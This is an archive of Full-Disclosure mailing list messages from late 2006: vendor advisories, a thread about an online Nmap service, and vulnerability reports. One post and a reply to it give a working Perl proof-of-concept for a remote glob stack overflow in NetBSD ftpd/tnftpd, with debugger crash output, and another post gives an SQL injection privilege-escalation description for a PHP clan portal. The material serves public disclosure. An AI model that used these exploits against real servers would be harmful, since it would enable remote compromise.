From jammer128 at gmail.com Fri Dec 1 00:19:23 2006 From: jammer128 at gmail.com (Jason Miller) Date: Thu, 30 Nov 2006 18:19:23 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456BF10D.9080400@matousec.com> References: <456BF10D.9080400@matousec.com> Message-ID: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> im detecting legal actions already. On 11/28/06, David Matousek wrote: > > Hello, > > For all Nmap fans, our group have implemented Nmap Online service. > Its address is http://nmap-online.com/. The interface allows you to > perform custom > Nmap scans from our server with only a few limitations in the syntax. > The service is free and can be used immediately, no registration is > required. > > Please direct your questions and suggestions to our emails. > > > Regards, > > -- > David Matousek > > Founder and Chief Representative of Matousec - Transparent security > http://www.matousec.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061130/4be1a282/attachment.html From zdi-disclosures at 3com.com Fri Dec 1 00:27:41 2006 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 30 Nov 2006 16:27:41 -0800 Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability In-Reply-To: Message-ID: Thanks for pointing this out JP, it does in fact look confusing. We determined during the Digital Vaccine filter creation process that a previously released filter was robust enough to block the attack without further modification and the vendor was immeditately notified. ZDI Team "Dude VanWinkle" 11/30/2006 05:02 AM To zdi-disclosures/F/US/3Com at 3Com cc full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com Subject Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability On 11/29/06, zdi-disclosures at 3com.com wrote: > ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow > Vulnerability > http://www.zerodayinitiative.com/advisories/ZDI-06-043.html > November 29, 2006 > -- Disclosure Timeline: > 2005.07.07 - Digital Vaccine released to TippingPoint customers > 2006.10.02 - Vulnerability reported to vendor > 2006.11.29 - Coordinated public release of advisory you waited over a year to report it to the vendor? sounds like analyzing your digital vaccine rules might yield a slew of reproducible 0 days that vendors are unaware of..... -JP From kingcope at gmx.net Fri Dec 1 00:25:14 2006 From: kingcope at gmx.net (kcope) Date: Fri, 01 Dec 2006 01:25:14 +0100 Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE*** Message-ID: <20061201002514.196150@gmx.net> LAMERZ!!!!! KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!! Greetings to the elite guys, thank you for your time. signed, ***eliteboy*** $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$ About tnftpd is a port of the NetBSD FTP server to other systems. It offers many enhancements over the traditional BSD ftpd, including per-class configuration directives via ftpd.conf(5), RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6, transfer rate throttling, and more. tnftpd was formerly known as lukemftpd, and earlier versions are present in Mac OS X 10.2 (as ftpd) and FreeBSD 5.0 (as lukemftpd). Description The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun, which can lead to a root compromise. The bug is in glob.c file. The globbing mechanism is flawed as back in 2001. To trigger the overflow you can create a folder and use the globbing special characters (like STARS) to overflow an internal stack based buffer. Example PoC: ---snip--- use IO::Socket; $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10', PeerPort => '21', Proto => 'tcp'); $c = "C"; $a = "C" x 255; $d = "A" x 450; print $sock "USER kcope\r\n"; print $sock "PASS remoteroot\r\n"; $x = ; print $sock "MKD $a\r\n"; print $sock "NLST C*/../C*/../C*/../$d\r\n"; print $sock "QUIT\r\n"; while (<$sock>) { print; } ---snip--- gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 : (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x00410041 in ?? () (gdb) tnftpd-20040810 behaves similar. FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested, however they could have the same bug, because of the same codebase. The problem when exploiting this kind of bug is, that we can only control 0x00410041, not the whole 32 bit. However it looks feasible to find a way to do a hole EIP redirection and/or exploit the bug the "unicode" way, which could be especially hard on BSD systems. -- Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! Ideal f?r Modem und ISDN: http://www.gmx.net/de/go/smartsurfer From kf_lists at digitalmunition.com Fri Dec 1 01:17:23 2006 From: kf_lists at digitalmunition.com (K F (lists)) Date: Thu, 30 Nov 2006 20:17:23 -0500 Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE*** In-Reply-To: <20061201002514.196150@gmx.net> References: <20061201002514.196150@gmx.net> Message-ID: <456F82A3.40001@digitalmunition.com> I can confirm that this bug is present on OSX 10.3.9 at the very least. lukemftpd-20040810 is the version this was tested against. I am fairly sure that this issue was patched recently in: Security Update 2006-003 * *FTPServer* CVE-ID: CVE-2006-1445 Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.6, Mac OS X Server v10.4.6 Impact: FTP operations by authenticated FTP users may lead to arbitrary code execution Description: Multiple issues in FTP server path name handling could result in a buffer overflow. A malicious authenticated user may be able to trigger this overflow which may lead to arbitrary code execution with the privileges of the FTP server. This update adresses the issue by properly handling the boundary conditions. ftp> o localhost Trying ::1... Connected to localhost. 220 localhost FTP server (tnftpd 20040810) ready. Name (localhost:kevinf): 331 Password required for kevinf. Password: 230- Welcome to Darwin! 230 User kevinf logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> mkdir CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 550 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC: File exists. ftp> ls C*/../C*/../C*/../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 229 Entering Extended Passive Mode (|||49225|) 421 Service not available, remote server timed out. Connection closed ftp> kevin-fs-Computer:/cores kevinf$ sudo gdb -q /usr/libexec/ftpd 425 Password: Reading symbols for shared libraries ... done /cores/425: No such file or directory. Attaching to program: `/usr/libexec/ftpd', process 425. Reading symbols for shared libraries ........... done 0x9000ed44 in read () (gdb) c Continuing. Program received signal EXC_BAD_ACCESS, Could not access memory. 0x00410040 in ?? () (gdb) bt #0 0x00410040 in ?? () Cannot access memory at address 0x410040 Cannot access memory at address 0x410041 #1 0x00000000 in ?? () (gdb) kevin-fs-Computer:/Volumes/HARD DISK kevinf$ ps -aux -ocommand,svuid,svgid,ruid,rgid,uid,gid | grep ftpd kevinf 425 0.0 0.3 28072 820 ?? SXs 8:02PM 0:00.05 0 0 0 0 501 501 ftpd -l This could be fun on x86 machines.... good luck on powerpc howerver. Thanks for the excuse to finish my OSX Unicode research! -KF kcope wrote: > LAMERZ!!!!! > KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!! > > Greetings to the elite guys, thank you for your time. > > signed, > ***eliteboy*** > > $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$ > > About > > tnftpd is a port of the NetBSD FTP server to other systems. > It offers many enhancements over the traditional BSD ftpd, > including per-class configuration directives via ftpd.conf(5), > RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6, > transfer rate throttling, and more. > tnftpd was formerly known as lukemftpd, > and earlier versions are present in Mac OS X 10.2 (as ftpd) > and FreeBSD 5.0 (as lukemftpd). > > Description > > The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun, > which can lead to a root compromise. > > The bug is in glob.c file. The globbing mechanism is flawed as back in > 2001. > > To trigger the overflow you can create a folder and use the globbing > special characters (like STARS) to overflow an internal stack based buffer. > Example PoC: > ---snip--- > use IO::Socket; > > $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10', > PeerPort => '21', > Proto => 'tcp'); > $c = "C"; > $a = "C" x 255; > $d = "A" x 450; > > print $sock "USER kcope\r\n"; > print $sock "PASS remoteroot\r\n"; > $x = ; > print $sock "MKD $a\r\n"; > print $sock "NLST C*/../C*/../C*/../$d\r\n"; > print $sock "QUIT\r\n"; > > while (<$sock>) { > print; > } > ---snip--- > > gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 : > (gdb) c > Continuing. > > Program received signal SIGSEGV, Segmentation fault. > 0x00410041 in ?? () > (gdb) > > > > > tnftpd-20040810 behaves similar. > FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested, > however they could have the same bug, because of the same > codebase. > > The problem when exploiting this kind of bug is, > that we can only control 0x00410041, not the whole > 32 bit. However it looks feasible to find a way > to do a hole EIP redirection and/or exploit > the bug the "unicode" way, which could be especially > hard on BSD systems. > > From dudevanwinkle at gmail.com Fri Dec 1 01:52:25 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Thu, 30 Nov 2006 20:52:25 -0500 Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability In-Reply-To: References:

Message-ID: On 11/30/06, zdi-disclosures at 3com.com wrote: > Thanks for pointing this out JP, it does in fact look confusing. We > determined during the Digital Vaccine filter creation process that a > previously released filter was robust enough to block the attack without > further modification and the vendor was immeditately notified. NP, I would clarify that in future notifications. i.e.: "tippingpoint customers have been protected from attacks of this kind since xyz date by GenericFilterX". Then you could list the time lines for discovered/acquired, vendor notification, patch released from vendor, and finally; public disclosure. -JP From security at mandriva.com Fri Dec 1 02:18:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Thu, 30 Nov 2006 19:18:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:220 ] - Updated libgsf packages fix heap buffer overflow vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:220 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libgsf Date : November 30, 2006 Affected: 2007.0, Corporate 3.0 _______________________________________________________________________ Problem Description: "infamous41md" discovered a heap buffer overflow vulnerability in libgsf, a GNOME library for reading and writing structured file formats, which could lead to the execution of arbitrary code. The updated packages have been patched to correct this problem. _______________________________________________________________________ References: http://www.debian.org/security/2006/dsa-1221 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.0: e2a8d38173f4d4eaf630779b212b9ecf 2007.0/i586/libgsf-1_114-1.14.1-2.1mdv2007.0.i586.rpm 0874198afe21dd57b297614d0451416c 2007.0/i586/libgsf-1_114-devel-1.14.1-2.1mdv2007.0.i586.rpm 5d46cfd87b088be65ac564b4208d3780 2007.0/i586/libgsf-1.14.1-2.1mdv2007.0.i586.rpm 029b6965cd0d3c6ea198e9ac601fb972 2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 003d7db8087dc2e8b1773011e6d4847a 2007.0/x86_64/lib64gsf-1_114-1.14.1-2.1mdv2007.0.x86_64.rpm 583a7f1fdd9b0c92b2ff6d64b18b08b4 2007.0/x86_64/lib64gsf-1_114-devel-1.14.1-2.1mdv2007.0.x86_64.rpm 1e676f26116db9f4a392d2719db228d5 2007.0/x86_64/libgsf-1.14.1-2.1mdv2007.0.x86_64.rpm 029b6965cd0d3c6ea198e9ac601fb972 2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm Corporate 3.0: c059f972836144253da330f8db5387a3 corporate/3.0/i586/libgsf-1_1-1.8.2-1.1.C30mdk.i586.rpm 9f9fd3e74c9ec2ee6a79937d4740321c corporate/3.0/i586/libgsf-1_1-devel-1.8.2-1.1.C30mdk.i586.rpm 36f8c30001d414877e819c439143a696 corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm Corporate 3.0/X86_64: 1a2bef3524a009d553419b159d80f781 corporate/3.0/x86_64/lib64gsf-1_1-1.8.2-1.1.C30mdk.x86_64.rpm f2e48664350fd62e2b12dc77abe11a46 corporate/3.0/x86_64/lib64gsf-1_1-devel-1.8.2-1.1.C30mdk.x86_64.rpm 36f8c30001d414877e819c439143a696 corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFb2VImqjQ0CJFipgRAkAZAKC/C/ST0+jm03acd2z99w3DHkeT2wCfcTw3 bxchI1qLhQdHz6tA/yajqL8= =Snqc -----END PGP SIGNATURE----- From security at mandriva.com Fri Dec 1 03:29:01 2006 From: security at mandriva.com (security at mandriva.com) Date: Thu, 30 Nov 2006 20:29:01 -0700 Subject: [Full-disclosure] [ MDKSA-2006:221 ] - Updated gnupg packages fix vulnerability Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2006:221 http://www.mandriva.com/security/ _______________________________________________________________________ Package : gnupg Date : November 30, 2006 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Buffer overflow in the ask_outfile_name function in openfile.c for GnuPG (gpg) 1.4 and 2.0, when running interactively, might allow attackers to execute arbitrary code via messages that cause the make_printable_string function to return a longer string than expected while constructing a prompt. Updated packages have been patched to correct this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: c3ce4cd92136d7f632c14a6c80938b82 2006.0/i586/gnupg-1.4.2.2-0.4.20060mdk.i586.rpm bfaeaba79a74d3873b598f90e0e801e0 2006.0/i586/gnupg2-1.9.16-4.3.20060mdk.i586.rpm 9ac3ae5eb7475c230c7a7d0937c1c381 2006.0/SRPMS/gnupg-1.4.2.2-0.4.20060mdk.src.rpm c5da4a8a6e5bd9ec333d73180d93d64f 2006.0/SRPMS/gnupg2-1.9.16-4.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 8fcc5fdb170d0b268c13f93aabe0502e 2006.0/x86_64/gnupg-1.4.2.2-0.4.20060mdk.x86_64.rpm b7ef342175e3eaac7fc3794159f2064e 2006.0/x86_64/gnupg2-1.9.16-4.3.20060mdk.x86_64.rpm 9ac3ae5eb7475c230c7a7d0937c1c381 2006.0/SRPMS/gnupg-1.4.2.2-0.4.20060mdk.src.rpm c5da4a8a6e5bd9ec333d73180d93d64f 2006.0/SRPMS/gnupg2-1.9.16-4.3.20060mdk.src.rpm Mandriva Linux 2007.0: d7ddd9237786b5e2d3b0fed45f1a1071 2007.0/i586/gnupg-1.4.5-1.1mdv2007.0.i586.rpm cc2078cc49dc6fb5f11add689684e60a 2007.0/i586/gnupg2-1.9.22-2.1mdv2007.0.i586.rpm a492a12d44d0491f676566959847c4e6 2007.0/SRPMS/gnupg-1.4.5-1.1mdv2007.0.src.rpm f1816783fde74d0233d44ae64301886c 2007.0/SRPMS/gnupg2-1.9.22-2.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 9ba224c45d13760e8100d88159818da0 2007.0/x86_64/gnupg-1.4.5-1.1mdv2007.0.x86_64.rpm 13a6b47c7f88ffc1614e42a1276b7ac4 2007.0/x86_64/gnupg2-1.9.22-2.1mdv2007.0.x86_64.rpm a492a12d44d0491f676566959847c4e6 2007.0/SRPMS/gnupg-1.4.5-1.1mdv2007.0.src.rpm f1816783fde74d0233d44ae64301886c 2007.0/SRPMS/gnupg2-1.9.22-2.1mdv2007.0.src.rpm Corporate 3.0: 92abcd2621d7f9ae84625abda55ac4d0 corporate/3.0/i586/gnupg-1.4.2.2-0.4.C30mdk.i586.rpm ec6725061073900f143df92a6f398f20 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.4.C30mdk.src.rpm Corporate 3.0/X86_64: b6d1b7f3f609295724f3fe2372ba6103 corporate/3.0/x86_64/gnupg-1.4.2.2-0.4.C30mdk.x86_64.rpm ec6725061073900f143df92a6f398f20 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.4.C30mdk.src.rpm Corporate 4.0: 7149e243684d303bd5b2bbda7ee9ffb9 corporate/4.0/i586/gnupg-1.4.2.2-0.4.20060mlcs4.i586.rpm c918da1cadd3c86aca8a6317cd36fc28 corporate/4.0/i586/gnupg2-1.9.16-4.3.20060mlcs4.i586.rpm b94a486c4644fd56ed61602b0ab7fac7 corporate/4.0/SRPMS/gnupg-1.4.2.2-0.4.20060mlcs4.src.rpm eb8b52a35c09081cc9f3f8e70ae67e5f corporate/4.0/SRPMS/gnupg2-1.9.16-4.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: ad3b69e395186d56ec93a2ac21330bc3 corporate/4.0/x86_64/gnupg-1.4.2.2-0.4.20060mlcs4.x86_64.rpm 8c7327c6d4244a7a8ead9d1f5f4f462e corporate/4.0/x86_64/gnupg2-1.9.16-4.3.20060mlcs4.x86_64.rpm b94a486c4644fd56ed61602b0ab7fac7 corporate/4.0/SRPMS/gnupg-1.4.2.2-0.4.20060mlcs4.src.rpm eb8b52a35c09081cc9f3f8e70ae67e5f corporate/4.0/SRPMS/gnupg2-1.9.16-4.3.20060mlcs4.src.rpm Multi Network Firewall 2.0: 08d7f0201cff5462b8ad7ea010e241b2 mnf/2.0/i586/gnupg-1.4.2.2-0.5.M20mdk.i586.rpm 2c9b6c752e00c97793e7e436c89d2c5a mnf/2.0/SRPMS/gnupg-1.4.2.2-0.5.M20mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFFb3PbmqjQ0CJFipgRAr2rAJ9RIKCR3c9Ub/bUZOiV2TOkLqC31ACeLyjd ViNXuwBd2xrr6sqSzGL+2DU= =H7Y/ -----END PGP SIGNATURE----- From tonnerre.lombard at sygroup.ch Fri Dec 1 07:47:13 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 08:47:13 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <456C6AFF.3060004@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> Message-ID: <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> Salut, On Tue, 2006-11-28 at 11:59 -0500, J. Oquendo wrote: > Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 > awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' What if I set my user name to "bikermice from mars"? Are you going to blacklist mars then? Tonnerre -- SyGroup GmbH Tonnerre Lombard Solutions Systematiques Tel:+41 61 333 80 33 Roeschenzerstrasse 9 Fax:+41 61 383 14 67 4153 Reinach BL Web:www.sygroup.ch tonnerre.lombard at sygroup.ch -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 825 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/8c8b5788/attachment.bin From dante at alighieri.org Fri Dec 1 08:47:00 2006 From: dante at alighieri.org (Davide Del Vecchio) Date: Fri, 01 Dec 2006 09:47:00 +0100 Subject: [Full-disclosure] =?iso-8859-1?q?3Com_TFTP_Service_=3C=3D_2=2E0?= =?iso-8859-1?q?=2E1_=28Long_Transporting_Mode=29__Overflow_Exploit?= Message-ID: <20061201084700.1146.qmail@webmaild.fe1.aruba.it> Hello list, this is a poc exploit for 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit written by Cthulhu http://www.crazybinary.org/exploits/3comftp_xpsp2.rb Enjoy it, Davide Del Vecchio & Michele Tumolo (Cthulhu). - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Davide Del Vecchio "Dante Alighieri" dante at alighieri.org http://www.alighieri.org http://legaest.blogspot.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - From michael.huber at gmail.com Fri Dec 1 08:13:38 2006 From: michael.huber at gmail.com (Mike Huber) Date: Fri, 1 Dec 2006 03:13:38 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: first of all, IANAL, but the TOS seem to cover the basics... However, I am unsure whether they would hold up under strict legal scrutiny. As far as I can tell, they may hold up under US criminal law, but not under civil law, as tort law has its own wonderful little eccentricities. The best safeguard they seem to have is that they must log the source IP of all scan requests... As far as I know, anyone who takes the time to read the nmap man page should be able to craft a scan which won't be detected by the scanned host (can someone be a definitive source on this point?), and anyone taking malicious action ought to be taking sufficient precautions to avoid detection anyway. None-the-less, my 8-ball sees litigation in their future. On 11/30/06, Jason Miller wrote: > > im detecting legal actions already. > > On 11/28/06, David Matousek wrote: > > > > Hello, > > > > For all Nmap fans, our group have implemented Nmap Online service. > > Its address is http://nmap-online.com/. The interface allows you to > > perform custom > > Nmap scans from our server with only a few limitations in the syntax. > > The service is free and can be used immediately, no registration is > > required. > > > > Please direct your questions and suggestions to our emails. > > > > > > Regards, > > > > -- > > David Matousek > > > > Founder and Chief Representative of Matousec - Transparent security > > http://www.matousec.com/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/27f4c92f/attachment.html From announce-noreply at rpath.com Fri Dec 1 03:40:00 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:40:00 -0500 Subject: [Full-disclosure] rPSA-2006-0220-1 dovecot Message-ID: <456fa410.x1FK2H34l0MlWBaT%announce-noreply@rpath.com> rPath Security Advisory: 2006-0220-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Local Deterministic Denial of Service Updated Versions: dovecot=/conary.rpath.com at rpl:devel//1/1.0.beta8-4.2-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5973 https://issues.rpath.com/browse/RPL-802 Description: Previous versions of the dovecot package are vulnerable to a denial of service attack only in a non-default configuration, and only by authenticated users in that configuration. From announce-noreply at rpath.com Fri Dec 1 03:43:57 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:43:57 -0500 Subject: [Full-disclosure] rPSA-2006-0221-1 openldap openldap-clients openldap-servers Message-ID: <456fa4fd.mjZLbPK7jnGjCHNF%announce-noreply@rpath.com> rPath Security Advisory: 2006-0221-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: openldap=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1 openldap-clients=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1 openldap-servers=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779 https://issues.rpath.com/browse/RPL-820 Description: Previous versions of the openldap package are vulnerable to a remote denial of service attack that causes the openldap daemon to crash. This vulnerability is understood not to enable any form of remote execution. From announce-noreply at rpath.com Fri Dec 1 03:46:14 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:46:14 -0500 Subject: [Full-disclosure] rPSA-2006-0222-1 tar Message-ID: <456fa586.6BVDPdoZiyllr7wx%announce-noreply@rpath.com> rPath Security Advisory: 2006-0222-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Vulnerability Updated Versions: tar=/conary.rpath.com at rpl:devel//1/1.15.1-7.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097 https://issues.rpath.com/browse/RPL-821 Description: Previous version of the tar package are vulnerable to an attack in which unpacking an intentionally-malformed tar archive can overwrite arbitrary files to which the user running tar has write access. If the attacking user knows the name of a vulnerable binary file and overwrites it, this allows the attacker to place arbitrary code on the system which is likely to be run. If root is running tar, this includes any file on the system, which would elevate this to an indirect non-deterministic remote root unauthorized access vulnerability. From announce-noreply at rpath.com Fri Dec 1 03:48:29 2006 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Thu, 30 Nov 2006 22:48:29 -0500 Subject: [Full-disclosure] rPSA-2006-0224-1 gnupg Message-ID: <456fa60d.GYk4A3QvAzgXP9D7%announce-noreply@rpath.com> rPath Security Advisory: 2006-0224-1 Published: 2006-11-30 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Non-deterministic Unauthorized Access Updated Versions: gnupg=/conary.rpath.com at rpl:devel//1/1.4.5-1.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169 https://issues.rpath.com/browse/RPL-826 Description: Previous versions of the gnupg package contain a weakness that may enable an attacker to create a malformed message that causes gnupg to crash or execute arbitrary code provided by the attacker. This weakness exists only in interactive mode; other applications which call gpg in batch mode are not susceptible. From scy-adv at scytale.de Fri Dec 1 09:00:32 2006 From: scy-adv at scytale.de (Tim Weber) Date: Fri, 1 Dec 2006 10:00:32 +0100 Subject: [Full-disclosure] deV!L`z Clanportal - SQL Injection [061124a] Message-ID: <200612011000.33083.scy-adv@scytale.de> / -[061124a]- \ | deV!L`z Clanportal - SQL Injection | \ / S Y N O P S I S / =================' -( access: remote severity: high )- An SQL injection has been found in deV!L`z Clanportal, which allows any logged in user to grant herself admin privileges in the system. B A C K G R O U N D / =====================' deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody to create a feature-rich website for her online gaming clan. A F F E C T E D V E R S I O N S / ===================================' verified on: 1.3.6 possibly vulnerable: <= 1.3.6 fixed in: 1.3.6.1 I M P A C T / =============' The attacker gains admin privileges in DZCP and is thus able to create and download a MySQL dump, upload files, post news, delete users etc. P R E R E Q U I S I T I E S / =============================' o the attacker needs to have an user account in the suite and be logged in o php.ini directive "magic_quotes_gpc" has to be disabled D E S C R I P T I O N / =======================' sites/index.php is not escaping the $_GET['show'] parameter, leading to an SQL injection. This can be used to pass any string to the $where parameter in DZCP's page() function. page(), in turn, is not checking that parameter, allowing a second SQL injection in an UPDATE statement on the "users" table to change arbitrary attributes in the calling user's tuple, including the "level" attribute, which, set to 4, grants the user administrator privileges. W O R K A R O U N D / =====================' Some possibilities: o Add a mysql_real_escape_string() around the $_GET parameter in the SQL query in sites/index.php. o Remove sites/index.php or make it inaccessible. o Quit using DZCP. I mean it! There are tons of other vulnerabilites just waiting to be exploited; some of them more severe than this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal. P R O O F O F C O N 